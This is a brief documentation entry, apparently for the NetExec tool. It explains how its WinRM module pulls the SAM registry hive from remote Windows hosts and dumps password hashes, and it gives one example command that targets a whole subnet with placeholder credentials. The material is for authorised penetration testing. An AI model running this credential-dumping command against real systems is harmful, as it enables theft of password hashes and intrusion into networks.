Extracts and downloads SAM registry hive, and uses secretsdump.py methods locally to dump hashes
You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
nxc winrm 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --sam
Last updated 3 months ago
Was this helpful?